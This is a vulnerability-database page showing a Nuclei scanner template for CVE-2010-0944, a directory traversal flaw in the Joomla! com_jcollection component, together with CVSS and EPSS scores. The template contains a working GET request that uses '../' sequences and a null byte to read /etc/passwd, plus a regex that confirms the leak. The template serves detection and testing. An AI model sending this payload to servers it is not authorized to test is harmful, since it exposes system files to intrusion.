Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-0944
HistoryAug 12, 2021 - 2:42 a.m.

Joomla! Component com_jcollection - Directory Traversal

2021-08-1202:42:36
ProjectDiscovery
github.com
2

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.6 Medium

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

75.9%

A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-0944

info:
  name: Joomla! Component com_jcollection - Directory Traversal
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server.
  remediation: Apply all relevant security patches and product upgrades.
  reference:
    - https://www.exploit-db.com/exploits/11088
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0944
    - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
    - http://www.exploit-db.com/exploits/11088
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/55514
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-0944
    cwe-id: CWE-22
    epss-score: 0.00477
    epss-percentile: 0.75733
    cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: thorsten_riess
    product: com_jcollection
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008f1855af5bb1a227548d57889794aa0e4980ed4ad2d957a76ddae12c2637d95a02204db4794c8d6b70b3353904e9c69d9c72140784e582490844f39f61760ba387cd:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.6 Medium

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

75.9%

Related for NUCLEI:CVE-2010-0944